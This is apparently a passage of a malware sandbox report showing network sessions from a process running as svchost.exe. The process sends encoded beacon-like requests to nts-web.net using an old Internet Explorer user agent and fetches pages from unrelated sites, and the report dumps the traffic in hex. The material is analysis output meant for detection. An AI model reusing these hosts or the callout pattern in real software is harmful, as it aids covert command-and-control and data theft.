                                                                                                                                                                                                                                                                                                      Data Ascii: 22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3124INData Raw: 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: ,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3140INData Raw: 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3156INData Raw: 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: 3.18,0,0,1-4.22-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      45192.168.2.5372549.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:15 UTC765OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net
                                                                                                                                                                                                                                                                                                      Content-Length: 4680
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:15 UTC765OUTData Raw: 51 35 78 79 59 75 54 71 37 65 2f 78 38 2f 58 34 2b 76 7a 2b 41 51 4d 46 43 41 6f 44 35 41 50 62 31 54 66 4a 69 77 62 42 74 77 77 6e 69 4c 36 53 49 30 71 6d 48 63 58 79 78 64 44 38 70 38 61 54 43 56 63 34 52 47 4c 35 79 63 6e 62 4c 72 70 43 5a 30 63 43 72 73 66 39 2f 6b 75 51 6f 6b 4c 39 75 63 48 66 77 5a 6c 42 32 79 44 61 6a 62 61 65 4a 79 4d 4d 46 34 33 6a 31 56 48 49 2b 79 71 73 32 38 6c 44 75 4a 6e 62 57 68 41 58 54 4c 4b 32 53 37 72 65 51 74 61 50 38 33 46 69 46 50 44 64 63 50 79 6f 42 63 4d 33 43 6f 4c 75 36 66 57 2f 63 38 69 52 78 30 48 59 39 6b 76 4c 54 6e 73 50 68 38 4a 5a 52 47 6d 71 79 69 66 76 68 54 66 48 71 52 50 44 66 72 2b 50 68 7a 53 46 4f 52 33 38 4d 79 59 36 50 35 4e 6e 43 75 54 78 31 36 37 54 67 61 71 30 4c 34 38 42 4e 59 53 48 44 64 46
                                                                                                                                                                                                                                                                                                      Data Ascii: Q5xyYuTq7e/x8/X4+vz+AQMFCAoD5APb1TfJiwbBtwwniL6SI0qmHcXyxdD8p8aTCVc4RGL5ycnbLrpCZ0cCrsf9/kuQokL9ucHfwZlB2yDajbaeJyMMF43j1VHI+yqs28lDuJnbWhAXTLK2S7reQtaP83FiFPDdcPyoBcM3CoLu6fW/c8iRx0HY9kvLTnsPh8JZRGmqyifvhTfHqRPDfr+PhzSFOR38MyY6P5NnCuTx167Tgaq0L48BNYSHDdF


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      46192.168.2.51864449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:31 UTC803OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net
                                                                                                                                                                                                                                                                                                      Content-Length: 4680
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:31 UTC803OUTData Raw: 51 35 78 79 59 75 54 71 37 65 2f 78 38 2f 58 34 2b 76 7a 2b 41 51 4d 46 43 41 6f 44 35 41 50 62 31 54 66 4a 69 77 62 42 74 77 77 6e 69 4c 36 53 49 30 71 6d 48 63 58 79 78 64 44 38 70 38 61 54 43 56 63 34 52 47 4c 35 79 63 6e 62 4c 72 70 43 5a 30 63 43 72 73 66 39 2f 6b 75 51 6f 6b 4c 39 75 63 48 66 77 5a 6c 42 32 79 44 61 6a 62 61 65 4a 79 4d 4d 46 34 33 6a 31 56 48 49 2b 79 71 73 32 38 6c 44 75 4a 6e 62 57 68 41 58 54 4c 4b 32 53 37 72 65 51 74 61 50 38 33 46 69 46 50 44 64 63 50 79 6f 42 63 4d 33 43 6f 4c 75 36 66 57 2f 63 38 69 52 78 30 48 59 39 6b 76 4c 54 6e 73 50 68 38 4a 5a 52 47 6d 71 79 69 66 76 68 54 66 48 71 52 50 44 66 72 2b 50 68 7a 53 46 4f 52 33 38 4d 79 59 36 50 35 4e 6e 43 75 54 78 31 36 37 54 67 61 71 30 4c 34 38 42 4e 59 53 48 44 64 46
                                                                                                                                                                                                                                                                                                      Data Ascii: Q5xyYuTq7e/x8/X4+vz+AQMFCAoD5APb1TfJiwbBtwwniL6SI0qmHcXyxdD8p8aTCVc4RGL5ycnbLrpCZ0cCrsf9/kuQokL9ucHfwZlB2yDajbaeJyMMF43j1VHI+yqs28lDuJnbWhAXTLK2S7reQtaP83FiFPDdcPyoBcM3CoLu6fW/c8iRx0HY9kvLTnsPh8JZRGmqyifvhTfHqRPDfr+PhzSFOR38MyY6P5NnCuTx167Tgaq0L48BNYSHDdF


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      47192.168.2.51986883.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC808OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: dataform.co.uk
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC927INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=2, max=98
                                                                                                                                                                                                                                                                                                      Content-Length: 48940
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                                                      X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:32 GMT
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC928INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC931INData Raw: 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 2c 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 73 28 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 39 37 39 32 2c 36 35 30 33 39 5d 2c 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 38 32 30 33 2c 39 37 39 32 2c 36 35 30 33 39 5d 29 7d 72 65 74 75 72
                                                                                                                                                                                                                                                                                                      Data Ascii: ,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}retur
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC939INData Raw: 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 32 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 62 65 67 69 6e 3d 27 30 27 20 6b 65 79 74 69 6d 65 73 3d 27 30 3b 2e 32 3b 2e 35 3b 31 27 20 6b 65 79 53 70 6c 69 6e 65 73 3d 27 30 2e 32 20 30 2e 32 20 30 2e 34 20 30 2e 38 3b
                                                                                                                                                                                                                                                                                                      Data Ascii: orm='translate(2)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repeatCount='indefinite' begin='0' keytimes='0;.2;.5;1' keySplines='0.2 0.2 0.4 0.8;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC947INData Raw: 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 22 2c 22 70 65 72 6d 61 6c 69 6e 6b 73 22 3a 22 31 22 2c 22 72 65 63 61 70 74 63 68 61 5f 73 69 74 65 5f 6b 65 79 22 3a 22 22 2c 22 72 65 63 61 70 74 63 68 61 5f 76 65 72 73 69 6f 6e 22 3a 22 76 32 22 2c 22 72 65 70 6c 69 65 73 5f 74 6f 5f 6c 6f 61 64 22 3a 22 35 22 2c 22 72 65 70 6c 79 5f 6c 61 62 65 6c 22 3a 22 52 65 70 6c 79 22 2c 22 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53 65 61 72 63 68 20 6f 70 74 69 6f 6e 73 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 22 3a 22 53 75 62 6d 69 74 20 54 69 63 6b 65 74 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 5f 6c 6f 61 64 69 6e 67 22 3a 22 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 22 2c 22 74 79 70 65 5f 74 6f 5f 73 65 61 72 63 68 22 3a 22 54 79
                                                                                                                                                                                                                                                                                                      Data Ascii: more options","permalinks":"1","recaptcha_site_key":"","recaptcha_version":"v2","replies_to_load":"5","reply_label":"Reply","search_placeholder":"Search options","submit_ticket":"Submit Ticket","submit_ticket_loading":"Please Wait...","type_to_search":"Ty
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC955INData Raw: 6f 6e 20 35 2e 34 2e 38 20 2d 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 4d 6f 62 69 6c 65 2d 46 72 69 65 6e 64 6c 79 20 53 6c 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65
                                                                                                                                                                                                                                                                                                      Data Ascii: on 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var remove
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC963INData Raw: 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: in-nav" role="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="m
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC980INData Raw: 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 37 39 34 36 30 33 33 32 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ction startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1679460332*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      48192.168.2.51991691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC808OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:46:17 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC809INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC825INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC841INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
